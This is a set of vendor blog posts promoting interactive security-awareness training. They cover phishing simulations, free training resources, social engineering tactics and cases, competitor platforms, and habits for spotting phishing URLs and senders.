security awareness

Security awareness exercises that actually work share one thing: they create practice, not just knowledge.

The gap between knowing phishing exists and recognizing it in your inbox under deadline pressure is enormous. That gap is where breaches happen. Effective exercises bridge it through realistic practice in safe environments.

Passive training (videos, slideshows, policy documents) creates knowledge without skill. Employees can define phishing but still click malicious links because recognition under pressure requires practiced reflexes, not memorized definitions.

The research is clear: people learn by doing. Security awareness exercises that engage employees in realistic decision-making create lasting behavioral change that passive content cannot match.

The most impactful single exercise type. Send realistic phishing emails, track who clicks, and provide immediate education.

What makes simulations effective:

• Realistic scenarios matching actual threats
• Immediate feedback at the moment of failure
• Progressive difficulty as employees improve
• Focus on reporting, not just avoiding clicks

Common mistakes:

• Templates too obviously fake
• Punishing failures instead of teaching
• Running simulations annually instead of continuously
• Ignoring reporting metrics

Phone-based (vishing) and in-person exercises test whether employees verify identities before sharing information or granting access.

Example scenarios:

• Caller claims to be IT support and requests password reset
• Visitor without badge asks to be let into secure area
• Email appears to be from executive requesting urgent wire transfer

These exercises reveal whether verification procedures are followed under social pressure.

Discussion-based scenarios walk teams through incident response without technical testing. Particularly valuable for:

• Ransomware response: Decision-making about payment, communication, recovery priorities
• Data breach disclosure: Regulatory notification, customer communication, legal coordination
• Executive compromise: Responding when leadership accounts are hijacked

Tabletops expose gaps in procedures and communication before real incidents reveal them painfully.

Hands-on practice with security tools:

• Setting up multi-factor authentication
• Using password managers correctly
• Recognizing suspicious URLs before clicking
• Encrypting sensitive communications

These exercises build practical capabilities, not just awareness.

Before training, measure current vulnerability. Run unannounced phishing simulations across the organization to establish:

• Current click-through rate
• Reporting rate (employees who flag suspicious emails)
• Time between receiving and reporting
• Department-level variation

This baseline enables demonstrating improvement and identifying highest-risk groups.

Different roles face different threats. Generic training wastes time on irrelevant scenarios.

Finance teams need:

• Business email compromise recognition
• Wire transfer verification procedures
• Invoice fraud identification

Executives need:

• Whaling attack recognition
• Authority exploitation awareness
• Incident communication protocols

IT staff need:

• Social engineering defense
• Secure system administration practices
• Incident response procedures

Security awareness isn’t an event. It’s a process.

Continuous reinforcement maintains awareness without creating fatigue.

Employees who fear punishment for failing exercises will:

• Hide mistakes instead of reporting them
• Resent security training
• Game the system rather than learn

Create environments where:

• Failures lead to education, not punishment
• Reporting suspicious activity is celebrated
• Questions are welcomed, not judged
• Learning is the explicit goal

• Security incident volume trends
• Employee sentiment toward security
• Compliance audit findings
• Near-miss reports from employees

Single measurements are less valuable than trends. A 15% click rate improving to 8% over six months demonstrates program effectiveness better than any single data point.

Exercises designed to catch people create resentment. Employees who feel tricked become resistant to the entire program and less likely to report future mistakes.

Instead: Frame exercises as practice opportunities. Celebrate improvement. Treat failures as learning moments.

Training about “hackers” and “cybercriminals” feels abstract. Scenarios involving your actual systems, vendors, and processes feel relevant.

Instead: Customize scenarios to reflect real threats facing your organization and industry.

Awareness decays rapidly. Annual training creates a brief spike of vigilance followed by 11 months of decline.

Instead: Maintain continuous, varied touchpoints throughout the year.

When executives exempt themselves from training, they signal that security isn’t actually important, and they remain the highest-value targets.

Instead: Ensure visible executive participation and support.

100% training completion means nothing if click rates don’t improve and reporting doesn’t increase.

Instead: Measure behavioral outcomes, not administrative checkboxes.

A 500-employee manufacturing company implemented a comprehensive exercise program after experiencing two successful phishing attacks in six months.

Baseline state:

• 32% phishing simulation click rate
• 4% suspicious email reporting rate
• Annual compliance video training

Program implemented:

• Monthly phishing simulations with immediate feedback
• Quarterly department-specific scenarios
• Security champion program with peer education
• Recognition for threat reporters

Results after 12 months:

• 6% phishing simulation click rate (81% improvement)
• 68% suspicious email reporting rate (17x increase)
• Zero successful phishing attacks
• Employee security satisfaction: 4.2/5 (up from 2.1/5)

The transformation came from practice, not policy. Employees who regularly encountered simulated threats developed reflexes that protected them against real ones.

• Run baseline phishing simulation
• Survey employees about security awareness
• Identify high-risk roles and departments

• Select exercise platforms and content
• Develop role-specific training paths
• Create communication plan
• Establish metrics and goals

• Roll out initial exercises to pilot group
• Gather feedback and adjust
• Expand organization-wide

• Monitor metrics monthly
• Update scenarios based on current threats
• Recognize and reward security-conscious behavior
• Continuously improve based on data

Security awareness exercises work because they create practice, not just knowledge. The organizations that dramatically reduce their phishing click rates and increase their incident reporting aren’t running better lectures. They’re running better exercises.

Start with baseline measurement. Design role-appropriate scenarios. Create psychological safety for learning. Measure outcomes, not completion. Iterate continuously.

Your employees encounter potential threats daily. Give them the practice they need to respond appropriately.

Experience the difference between passive content and interactive practice. Try our free security awareness exercises and see how simulation-based training builds real defensive skills.

Budget constraints are real. Whether you’re a startup founder, a small business owner, or an IT manager at a company that hasn’t yet prioritized security training investment, you need options that don’t require five-figure commitments.

Good news: legitimate free security awareness training exists. It won’t match enterprise platforms with dedicated customer success teams and unlimited customization, but it can meaningfully improve your organization’s security posture.

This guide separates genuinely useful free resources from marketing traps, explains what free options can and can’t do, and helps you make an informed decision about when free is enough and when it isn’t.

Before diving into specific resources, understand the business models behind free offerings:

Freemium models: Limited free tiers designed to demonstrate value and convert users to paid plans. These often restrict user counts, features, or content access.

Government and nonprofit resources: Genuinely free educational content funded by taxpayers or organizational missions. Quality varies, but there’s no sales funnel.

Marketing-driven content: Free resources designed primarily to capture leads. The training may be superficial, with real value locked behind paywalls.

Open-source projects: Community-developed resources available without cost. Often require technical expertise to deploy.

Each model has implications for what you’ll actually receive and what strings may be attached.

Let’s address the elephant in the room: we offer a free interactive exercise library and you’re reading our blog.

Here’s the honest breakdown:

What’s included free:

• Interactive 3D phishing simulations
• Social engineering awareness scenarios
• Basic security fundamentals exercises
• No registration required to try

What’s not included:

• Full course library (premium only)
• SCORM packages for LMS integration
• Analytics and completion tracking
• Custom branding and configuration
• Dedicated support

Why we do this: We believe people should experience quality security training before buying. Our free exercises demonstrate what’s possible with interactive simulations versus passive video content. Some organizations will never need more than free resources. Others will see the value and choose to invest in comprehensive solutions.

No guilt trips. No aggressive sales follow-up. Just quality free resources.

Several government agencies and nonprofits provide legitimate free security awareness resources:

The U.S. government’s cybersecurity agency offers:

• Free training courses covering security fundamentals
• Phishing awareness materials for organizational use
• Industry-specific guidance for critical infrastructure sectors
• Tabletop exercise packages for incident response practice

Best for: Organizations seeking credible, vendor-neutral content backed by government expertise.

Limitations: Content can be dry and government-focused. No interactive simulations or engagement features.

SANS, known for technical security training, offers:

• Free security awareness resources for community use
• Poster and newsletter templates
• Basic training modules on common threats

Best for: Organizations with technical audiences who respect the SANS brand.

Limitations: Free tier is limited; premium content requires significant investment.

StaySafeOnline.org provides:

• Consumer-focused security guidance
• Small business security resources
• Annual awareness campaign materials (Cybersecurity Awareness Month)

Best for: Small organizations seeking basic, accessible content.

Limitations: Consumer-oriented; may not address enterprise concerns adequately.

Free security awareness training may be sufficient if:

Your organization is small (under 25 employees)

• Administrative overhead of enterprise platforms isn’t justified
• You can personally follow up on training completion
• Individual attention compensates for platform limitations

You’re establishing baseline awareness

• Employees have never received security training
• Any training is better than current state (none)
• You’re building the case for future investment

You have technical capability

• IT staff can deploy open-source solutions
• You can build custom training using free content
• Integration with existing systems isn’t a requirement

Compliance isn’t driving requirements

• You’re not subject to regulations mandating specific training
• Audit documentation isn’t a primary concern
• “We did training” is sufficient for stakeholders

Consider paid solutions when:

Scale matters

• Training hundreds or thousands of employees
• Multiple locations or distributed workforce
• Administrative burden of manual tracking becomes prohibitive

Compliance requires documentation

• Regulations mandate training records
• Auditors expect completion reports
• Liability concerns require provable training delivery

Phishing simulation is essential

• You need to measure actual employee vulnerability
• Continuous testing is required for improvement
• Simulated attacks must appear legitimate

Behavior change is the goal

• Passive awareness isn’t translating to action
• You need engagement-driving features (gamification, competitions)
• Interactive scenarios are required for skill development

Integration is required

• Training must integrate with existing LMS
• Single sign-on is necessary for adoption
• Reporting must feed into security dashboards

If you’ve decided free resources fit your current needs, maximize their impact:

Don’t just share random links. Build a coherent curriculum:

1. Foundation: Basic security principles everyone needs
2. Threat-specific: Phishing, social engineering, password security
3. Role-specific: Additional content for high-risk positions
4. Ongoing: Regular reinforcement and updates

Generic free content becomes more relevant with organizational context:

• Add examples using your company’s actual systems and processes
• Include your specific policies and procedures
• Reference recent industry incidents affecting similar organizations
• Feature real (anonymized) near-misses from your organization

Even without platform analytics, measure something:

• Training completion (even if manually tracked)
• Quiz scores if resources include assessments
• Incident rates before and after training
• Employee feedback and comprehension

Annual training isn’t enough. Create ongoing touchpoints:

• Monthly security tips via email or Slack
• Quarterly focused training on specific threats
• Real-time alerts when relevant threats emerge
• Regular reminders of reporting procedures

Phishing simulation is the most impactful training component, but also the hardest to get free. Options include:

A legitimate open-source phishing simulation platform:

Pros:

• Fully featured simulation capability
• No per-user licensing costs
• Complete control over data

Cons:

• Requires technical expertise to deploy
• No support beyond community forums
• You’re responsible for email deliverability
• No pre-built training content

Best for: Organizations with technical staff willing to invest setup time.

Several vendors offer restricted free access:

• Limited user counts (often 25-50 users)
• Limited simulation frequency
• Basic reporting only
• Sales follow-up expected

Best for: Evaluating platforms before purchase or very small organizations.

If free resources are a stepping stone to proper investment, gather evidence:

• Document phishing emails that reached employees
• Note security incidents involving human error
• Research breach costs in your industry
• Calculate potential liability exposure

• Show tracking gaps that prevent compliance documentation
• Identify engagement issues with passive content
• Document administrative time spent on manual processes
• Note security gaps free resources don’t address

Compare training costs against:

• Average breach cost in your industry ($4.88 million globally)
• Incident response and recovery costs
• Regulatory fine exposure
• Reputation damage potential

Even modest training investments show favorable ROI against these risks.

When you’re ready to upgrade:

• Note which free content resonated with employees
• Keep reinforcement cadences that proved effective
• Maintain cultural elements that drove engagement

• Prioritize features that free resources lacked
• Focus on measurable improvements to existing weaknesses
• Ensure new platform solves actual problems, not theoretical ones

• Communicate change to employees
• Allow learning curve with new platform
• Compare metrics before and after transition

Free security awareness training is a legitimate starting point. Government resources, nonprofit content, and vendor free tiers can meaningfully improve security posture when budgets are constrained.

But free has limits. It lacks the engagement features, simulation capabilities, analytics, and support that drive sustained behavior change at scale. Organizations serious about security eventually outgrow free resources.

The question isn’t “free or paid?” It’s “free for now, or paid now?”

Start with quality free resources. Measure what you can. Build the case for investment. When you’re ready, transition to solutions that match your organizational maturity.

Your security posture shouldn’t be limited by what’s free. But it also shouldn’t be zero because enterprise solutions seem out of reach.

Experience the difference between passive and interactive security training. Try our free exercise library. No registration, no credit card, no sales pitch. Just quality training you can start today.

A hacker doesn’t need to crack your encryption. They just need to convince one employee to help them.

Social engineering attacks exploit human psychology instead of technical vulnerabilities. While your security team patches software and monitors networks, attackers study your organization chart, LinkedIn profiles, and even your company’s Glassdoor reviews, looking for ways to manipulate the humans behind your defenses.

These attacks work because they target something no firewall can protect: the natural human tendencies to trust, help, and comply with authority.

Traditional hacking targets systems. Social engineering targets people.

The most sophisticated security infrastructure becomes worthless when an employee willingly provides credentials, disables controls, or transfers funds because a convincing attacker asked them to.

Social engineers don’t use mind control. They leverage well-documented cognitive biases that affect everyone:

People comply with perceived authority figures. An email appearing to come from the CEO requesting an urgent wire transfer works because employees are conditioned to follow executive directives without questioning.

Time pressure short-circuits rational analysis. “Your account will be locked in 30 minutes” or “This deal closes today” creates panic that overrides caution.

When someone does something for us, we feel obligated to return the favor. An attacker who “helps” with a fake IT issue may ask for credentials in return.

We assume actions are correct if others are doing them. “Everyone in your department has already updated their credentials” makes compliance feel normal.

We’re more likely to comply with requests from people we like. Attackers build rapport, find common interests, and mirror communication styles to create artificial trust.

The most common attack vector. Fraudulent emails impersonate trusted entities (banks, vendors, colleagues) to steal credentials or deploy malware.

How it works:

1. Attacker researches target organization
2. Creates convincing email mimicking trusted sender
3. Includes malicious link or attachment
4. Victim clicks, providing credentials or installing malware

Real example: In 2020, Twitter employees received calls from attackers posing as internal IT support. The callers directed employees to a phishing site that captured their credentials, leading to the compromise of high-profile accounts including Barack Obama and Elon Musk.

Targeted phishing focused on specific individuals, using personal information to increase credibility.

Key differences from generic phishing:

• References specific projects, colleagues, or recent activities
• Appears to come from known contacts
• Contains accurate organizational details
• Tailored to victim’s role and responsibilities

Spear phishing targeting executives (“whales”) with access to significant funds or sensitive decisions.

Real example: In 2016, FACC, an Austrian aerospace company, lost €50 million when attackers convinced finance staff that the CEO had authorized emergency wire transfers for a confidential acquisition. Both the CEO and CFO were fired.

Phone-based attacks where callers impersonate IT support, executives, government officials, or other trusted entities.

Common pretexts:

• “IT helpdesk calling about a security issue”
• “This is HR verifying your benefits information”
• “Your bank’s fraud department has detected suspicious activity”

Text message attacks leveraging the immediacy and perceived legitimacy of SMS.

Why it’s effective:

• People trust text messages more than email
• Mobile screens hide suspicious URL details
• SMS feels more personal and urgent
• Links can appear as shortened URLs

Creating a fabricated scenario to establish trust before making the actual request.

Example scenario: An attacker calls reception claiming to be from the IT department. They explain they’re troubleshooting an issue affecting several departments and need to verify some information. After building rapport over several calls about “resolving” the fake issue, they request credentials to “complete the fix.”

Using physical or digital “bait” to deliver malware or capture credentials.

Physical baiting: Leaving infected USB drives in parking lots, lobbies, or conference rooms labeled “Payroll” or “Confidential”

Digital baiting: Offering free software, games, or media that contains malware

Gaining physical access by following authorized personnel through secured doors.

How it works: An attacker carrying boxes approaches a badge-protected door just as an employee exits. Social convention makes it awkward to demand credentials from someone who appears to belong, so the employee holds the door.

Attackers sent phishing emails to small groups of RSA employees with the subject “2011 Recruitment Plan” containing a malicious Excel file. One employee retrieved the email from their junk folder and opened it.

Result: Attackers gained access to RSA’s SecurID authentication system, ultimately affecting defense contractors and government agencies using RSA tokens.

Lesson: Technical controls (spam filtering) worked, but human curiosity defeated them.

Attackers used spear phishing emails targeting Sony executives with messages appearing to come from Apple about ID verification.

Result: Massive data breach exposing unreleased films, employee data, executive emails, and confidential business information. Estimated cost: $100+ million.

Lesson: Even tech-savvy organizations are vulnerable to well-crafted social engineering.

Attackers impersonated executives in emails requesting wire transfers to overseas accounts for a supposed acquisition.

Result: $46.7 million stolen. Some funds recovered, but significant losses remained.

Lesson: Email-based wire transfer requests require out-of-band verification regardless of apparent sender.

Train employees to recognize these red flags:

• Sender address doesn’t match claimed identity
• Unusual urgency or time pressure
• Requests for sensitive information or unusual actions
• Grammar and formatting inconsistent with sender’s normal style
• Links that don’t match expected destinations (hover to check)

• Unsolicited contact requesting sensitive information
• Pressure to act immediately
• Resistance to callback verification
• Requests to bypass normal procedures
• Information requests that seem excessive for stated purpose

• Unfamiliar person requesting access or information
• Claimed authority that can’t be verified
• Emotional manipulation (urgency, flattery, intimidation)
• Requests to circumvent security procedures

Technology can’t stop social engineering, but it can reduce attack surface:

Email security:

• Advanced threat detection for phishing
• DMARC, DKIM, SPF for sender verification
• Warning banners for external emails
• Link rewriting and sandboxing

Access controls:

• Multi-factor authentication everywhere
• Principle of least privilege
• Separate credentials for sensitive systems
• Physical access controls and visitor management

Policies that create friction for attackers:

Verification requirements:

• Out-of-band confirmation for wire transfers
• Callback procedures for sensitive requests
• Identity verification for help desk calls
• Visitor check-in and escort policies

Escalation paths:

• Clear procedures for reporting suspicious contacts
• No-retaliation policy for false positives
• Security team contact information readily available

The most critical defense layer:

Effective training includes:

• Recognition of attack techniques
• Psychological awareness (understanding why we’re vulnerable)
• Practical exercises (simulated phishing)
• Clear reporting procedures
• Regular reinforcement (not annual checkbox training)

Measure effectiveness through:

• Phishing simulation click rates
• Suspicious activity reporting rates
• Time to report potential incidents
• Post-incident analysis of successful attacks

Policies and training matter, but culture determines outcomes.

Executives must visibly follow security procedures. When the CEO ignores policies, employees conclude security isn’t actually important.

Celebrate employees who report suspicious activity, even false positives. The employee who reports 10 suspicious emails (including 9 that were legitimate) is protecting the organization. The employee who never reports anything is probably missing real threats.

Employees who fall for attacks should receive support and additional training, not punishment. Fear of blame drives concealment, which extends attacker access and increases damage.

Security awareness isn’t a training event. It’s an ongoing conversation. Regular updates about current threats, recent incidents (anonymized), and emerging techniques keep security top-of-mind.

When attacks succeed (and eventually they will):

1. Contain: Isolate affected systems and accounts
2. Preserve: Don’t delete evidence (logs, emails, files)
3. Report: Notify security team immediately
4. Document: Record timeline and actions taken

• Determine attack scope and affected systems
• Identify how attacker gained initial access
• Assess what information was accessed or stolen
• Document for potential legal proceedings

• Reset affected credentials
• Remediate compromised systems
• Address procedural gaps that enabled attack
• Update training based on lessons learned
• Consider notification obligations (legal, regulatory)

Social engineering attacks succeed because they target human nature, not technology. The same traits that make us good colleagues, like trust, helpfulness, and respect for authority, become vulnerabilities when exploited by skilled attackers.

Defense requires layered approaches: technical controls to reduce attack surface, procedures to verify sensitive requests, training to build recognition skills, and culture to encourage vigilance without creating paranoia.

Your employees will always be your greatest vulnerability. With proper training and culture, they can also become your strongest defense.

Want to experience social engineering attack simulations firsthand? Try our free interactive security exercises and practice identifying threats in realistic scenarios.

KnowBe4 dominates the security awareness training market. But market dominance doesn’t mean every organization is best served by the leader.

Whether you’re evaluating options for the first time, outgrowing your current solution, or finding KnowBe4’s approach doesn’t fit your needs, alternatives exist across every price point and feature set.

This comparison examines what different platforms offer, where they excel, and which organizational contexts they serve best.

Before comparing platforms, understand why buyers look beyond the obvious choice:

Pricing concerns: KnowBe4’s per-user licensing creates significant costs at scale. Organizations with thousands of users or tight budgets explore alternatives with different pricing models.

Content approach: KnowBe4’s content library is extensive but some organizations find the style doesn’t resonate with their workforce. Training effectiveness depends on engagement, and engagement depends on content fit.

Feature requirements: Some organizations need capabilities KnowBe4 doesn’t prioritize: advanced simulations, specific compliance frameworks, or particular LMS integrations.

Vendor diversity: Mature security programs avoid single-vendor dependency. Evaluating alternatives ensures competitive pricing and informed decisions.

User experience: Platform interfaces vary significantly. Organizations switching from one platform often cite usability as a primary driver.

Full disclosure: this is our platform. We’ll describe what we offer honestly, including what we do well and where we’re building.

Interactive 3D simulations: Rather than video content followed by quizzes, RansomLeak exercises place employees in realistic scenarios where they must identify threats, make decisions, and experience consequences in simulated environments.

Engagement-first design: Exercises use gamification, branching narratives, and immediate feedback to maintain attention and drive completion. Our completion rates consistently exceed industry benchmarks.

SCORM compatibility: Export any content as SCORM packages for integration with existing LMS platforms. One-click export, tested compatibility across major systems.

Flexible deployment: Use our cloud platform for full analytics and campaign management, or deploy SCORM packages through your existing infrastructure.

• Organizations prioritizing engagement and behavior change over checkbox compliance
• Companies with existing LMS investments wanting SCORM-compatible content
• Teams that have tried video-based training and found it ineffective
• Organizations seeking interactive simulations without enterprise complexity

• Smaller content library than established market leaders (we’re growing)
• Newer platform means less market validation (we’re proving ourselves)
• Advanced enterprise features still in development

Competitive per-user pricing with volume discounts. Free trial available with no credit card required.

Explore RansomLeak exercises →

Proofpoint acquired Wombat Security and integrates awareness training with their email security platform.

Email security integration: Organizations using Proofpoint for email protection benefit from unified reporting and threat intelligence that informs training content.

Established content library: Years of development produced comprehensive training modules covering most security topics.

Enterprise scale: Proven deployment across large organizations with complex requirements.

Pricing: Enterprise-focused pricing may not suit smaller organizations.

Platform bundling: Highest value comes with full Proofpoint suite adoption, which may not align with your security architecture.

Content style: Traditional video-heavy approach may not maximize engagement for all audiences.

• Organizations already invested in Proofpoint email security
• Enterprise buyers seeking integrated security platforms
• Compliance-focused programs prioritizing completeness over engagement

Cofense focuses specifically on phishing simulation and response.

Phishing specialization: Deep focus on phishing simulation creates sophisticated testing capabilities.

Managed services: Options for fully-managed phishing programs reduce internal resource requirements.

Incident response integration: PhishMe’s origins created strong workflows for reporting and responding to real attacks.

Narrow focus: Less comprehensive general security awareness content compared to broader platforms.

Complexity: Advanced features create learning curves for program administrators.

Pricing model: Can become expensive for comprehensive programs.

• Organizations prioritizing phishing simulation over general awareness
• Security teams wanting managed simulation services
• Mature programs needing advanced simulation capabilities

Mimecast acquired Ataata to add awareness training to their email security platform.

Email security integration: Similar to Proofpoint, organizations using Mimecast for email benefit from integrated reporting.

Risk-based targeting: Training recommendations based on email security data and threat exposure.

Short-form content: Micro-learning approach suits organizations seeking minimal time commitment.

Platform dependency: Value proposition strongest within Mimecast ecosystem.

Acquisition integration: Ataata integration still maturing in some areas.

Limited customization: Less flexibility than some alternatives for custom content needs.

• Existing Mimecast email security customers
• Organizations preferring micro-learning formats
• Buyers seeking integrated email security and training

SANS brings their technical training reputation to security awareness.

Technical credibility: SANS brand recognition matters for technical audiences who value authoritative content.

Comprehensive content: Deep library covering topics beyond basic awareness.

Role-based training: Strong differentiation for technical vs. non-technical audiences.

Premium pricing: SANS quality commands premium pricing that may exceed budgets.

Technical orientation: Content may be more technical than general workforce needs.

Less modern UX: Platform interface reflects enterprise software more than modern SaaS.

• Organizations with technical workforces valuing SANS credibility
• Buyers prioritizing content depth over engagement features
• Companies with training budgets supporting premium solutions

Terranova focuses on human risk management with awareness training as a component.

Behavior-focused approach: Emphasis on behavior change beyond simple awareness metrics.

Multilingual content: Strong internationalization for global organizations.

Compliance alignment: Content mapped to specific regulatory requirements.

Complex positioning: Platform capabilities can be difficult to evaluate quickly.

Market presence: Lower visibility than market leaders may concern some buyers.

• Global organizations needing multilingual content
• Compliance-driven programs requiring specific regulatory mapping
• Buyers interested in behavior-focused approaches

Before comparing platforms, clarify what matters most:

Must-haves:

• What features are non-negotiable?
• What integrations are required?
• What compliance requirements must be met?
• What budget constraints exist?

Nice-to-haves:

• What features would improve the program?
• What future needs should you plan for?
• What would make administration easier?

Platform demos should address:

• Admin experience for program management
• User experience for employees
• Reporting and analytics capabilities
• Integration processes
• Content library breadth and quality

Before committing, test with real users:

• Deploy to a small group
• Measure completion rates and engagement
• Gather user feedback
• Evaluate admin effort required
• Confirm integration functionality

Consider costs beyond licensing:

• Implementation and configuration effort
• Ongoing administration time
• Content customization needs
• Training for program administrators
• Integration maintenance

About content:

• How frequently is content updated?
• Can we preview the full library before purchase?
• How do you handle content that doesn’t resonate with our users?
• What customization options exist?

About phishing simulation:

• How realistic are simulation templates?
• Can we create custom simulations?
• How do you handle false positives (mail security catching simulations)?
• What reporting is available at individual, department, and organizational levels?

About integration:

• Which LMS platforms have you tested with?
• What’s the SCORM export process?
• How do you integrate with our email system?
• What SSO options are supported?

About support:

• What’s included in base pricing vs. additional cost?
• What’s typical response time for issues?
• Is there a customer success resource assigned to our account?
• How do you help us succeed, not just use the platform?

KnowBe4 remains the right choice if:

• You’re satisfied with current results
• Budget isn’t a primary constraint
• Content style resonates with your workforce
• You value market leadership and ecosystem size

Consider alternatives when:

• Engagement and completion rates are disappointing
• Pricing creates budget pressure at scale
• Specific features are missing that you need
• Your organization outgrew the initial solution

We’re the right fit if:

• Interactive simulations matter more than content volume
• SCORM compatibility is required
• Engagement drives your training effectiveness
• You want to experience quality training before committing

KnowBe4’s market position doesn’t make it universally optimal. The right security awareness platform depends on your organizational context, priorities, and constraints.

Define requirements clearly. Evaluate multiple options. Test before committing. The platform that creates behavior change for your workforce, regardless of market share, is the one worth choosing.

Experience interactive security training that prioritizes engagement. Try our free exercises. No sales pitch, just quality training you can evaluate on your own terms.

You know what phishing looks like. Misspelled words, suspicious links, Nigerian princes. You’ve done the training. You’ve passed the tests.

And yet.

Somewhere, right now, someone who knows all of this is clicking a link they shouldn’t. Not because they’re careless or stupid, but because they’re busy, distracted, and the email looked just legitimate enough.

Phishing detection isn’t about knowledge. It’s about habits that kick in automatically, even when you’re not thinking clearly.

Most phishing fails a quick sanity check. The problem is we don’t do the check. We see an email, we react, we click. The trick is building a pause into that reaction:

1. Was this expected? Unexpected requests for credentials, payments, or sensitive data are suspicious by default.

2. Does the context make sense? An “account locked” email for a service you don’t use is obviously fake. But even for services you do use, did you do anything that would trigger this?

3. Who sent this? Look at the actual email address, not just the display name. “PayPal Security” from security-paypal@mail-verify.net is not PayPal.

Most phishing attempts fail this 3-second test. The ones that pass deserve closer scrutiny.

URLs are the hardest thing for attackers to fake. Learn to read them.

https://account.paypal.com/login breaks down as:

• https:// - Protocol (should be HTTPS for any login)
• account.paypal.com - Domain (this is what matters)
• /login - Path (less important for legitimacy)

The domain is everything between :// and the next /. Within that domain, read right to left:

• paypal.com - This is the actual domain (owned by PayPal)
• account. - This is a subdomain (controlled by whoever owns paypal.com)

Attackers use several tricks:

Subdomain deception:

• paypal.account-verify.com - The domain is account-verify.com, not PayPal
• secure-paypal.com.malicious.net - The domain is malicious.net

Typosquatting:

• paypai.com (lowercase L instead of lowercase l)
• paypa1.com (number 1 instead of lowercase l)
• paypal-secure.com (adding words to legitimate brand)

Homograph attacks:

• Using characters from different alphabets that look identical
• pаypal.com using Cyrillic ‘а’ instead of Latin ‘a’

On desktop, hover over links to see their destination before clicking. On mobile, long-press links to preview URLs.

If the displayed text says “www.paypal.com” but the link goes elsewhere, that’s phishing.

Email display names can be anything. The actual address matters.

Legitimate:

• service@paypal.com
• noreply@email.chase.com

Suspicious:

• paypal-service@gmail.com
• support@paypal.security-verify.com
• alert@paypal.com.suspicious-domain.net

Urgency without specificity:

• “Your account will be suspended in 24 hours” - What account? Why?
• Legitimate services provide specific details about issues

Generic greetings:

• “Dear Customer” or “Dear User” when legitimate emails would use your name

Grammar and formatting:

• Legitimate companies have professional copywriters and QA processes
• Errors suggest rushed, non-professional origin

Mismatched branding:

• Wrong logo colors, fonts, or layouts
• Images that look stretched or pixelated
• Footer information that doesn’t match the claimed sender

Be especially cautious of:

• Unexpected attachments from anyone
• File types that can execute code (.exe, .js, .html, .zip with executables)
• “Invoice” or “Document” attachments you didn’t expect
• Password-protected files (attackers use this to bypass security scanners)

When you reach a website (whether through email link or direct navigation), verify legitimacy before entering credentials.

HTTPS with a valid certificate is necessary but not sufficient. Attackers get SSL certificates too.

What to check:

• Click the padlock icon → View certificate details
• Verify the certificate is issued to the expected organization
• Check the certificate isn’t expired

What certificates DON’T tell you:

• That the site is legitimate
• That your data is safe
• That you should trust the organization

A phishing site can have a perfectly valid SSL certificate.

Compare against your memory of the legitimate site:

• Are colors exactly right?
• Is the logo correct?
• Is the layout what you expect?
• Do fonts look professional?

When in doubt, navigate directly to the site by typing the URL or using a bookmark. Don’t trust links.

Phishing sites often only implement the pages needed for credential theft.

Signs of a fake:

• Footer links that go nowhere or to unrelated pages
• “Forgot password” or “Create account” links that don’t work
• Missing functionality that the real site would have
• Error messages that don’t make sense

Check when a domain was registered:

• Legitimate company domains are typically years old
• Phishing domains are often registered days or weeks before attacks

Use whois command or online tools to check domain age.

Search certificate transparency logs for the domain to see:

• When certificates were issued
• How many certificates exist for the domain
• Whether the certificate history matches expectations

For technical users:

• Inspect network requests to see where data is actually sent
• Check for suspicious JavaScript
• Look at form action URLs

1. Don’t click anything in the suspicious message
2. Report it - Forward to your IT security team or use the report phishing button
3. Delete it - Remove from inbox to avoid accidental future clicks

1. Close the tab immediately
2. Clear your browser cache
3. Run a malware scan
4. Monitor for unusual activity

1. Change password immediately on the legitimate site
2. Enable 2FA if not already active
3. Check for unauthorized activity in the affected account
4. Report the incident to IT security
5. Monitor related accounts - if you reuse passwords, change those too

Make verification automatic, not exceptional:

• Always check sender addresses
• Always hover over links before clicking
• Always navigate directly for sensitive actions

Assume unexpected requests are suspicious until verified:

• Banks don’t email asking for credentials
• Tech support doesn’t call unsolicited
• Legitimate urgency comes with verifiable specifics

If a request might be legitimate:

• Call the company using a number from their official website (not from the email)
• Navigate directly to the service and check your account
• Contact the purported sender through a known-good method

For organizations building phishing detection capabilities:

Regular simulated phishing campaigns:

• Establish baseline click rates
• Provide immediate education when employees click
• Track improvement over time
• Adjust difficulty as skills improve

Make reporting easy:

• One-click phishing report buttons in email clients
• No penalties for reporting false positives
• Feedback on reported items to reinforce good behavior

Ongoing touchpoints:

• Brief reminders about current phishing trends
• Examples of real attacks targeting your industry
• Recognition for employees who catch and report attempts

Here’s what I’ve learned watching thousands of people go through phishing simulations: the ones who catch attacks aren’t the most security-aware. They’re the ones who’ve built checking into their workflow.

They hover over every link. Not because they’re suspicious of that specific email, but because that’s just what they do. They verify sender addresses the way they check their mirrors before changing lanes. Automatic.

The goal isn’t to become paranoid. It’s to make verification so routine that you don’t have to think about it.

Most phishing attempts are obvious once you look. The trick is remembering to look when you’re tired, rushed, or just trying to get through your inbox before lunch.

Build detection habits through practice, not just training. Try our interactive security exercises with phishing scenarios designed to test your reflexes, not just your knowledge.